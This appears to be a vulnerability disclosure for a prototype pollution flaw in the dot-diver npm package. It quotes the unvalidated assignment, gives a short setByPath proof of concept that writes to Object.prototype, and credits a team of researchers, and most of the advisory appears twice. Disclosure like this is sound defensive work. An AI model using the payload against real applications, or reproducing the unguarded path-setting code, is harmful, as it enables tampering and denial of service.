Summary
There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
In this code, there is no validation for Prototpye Pollution.
PoC
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // fooImpact
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
Summary
There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
Details
In this code, there is no validation for Prototpye Pollution.
PoC
Impact
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )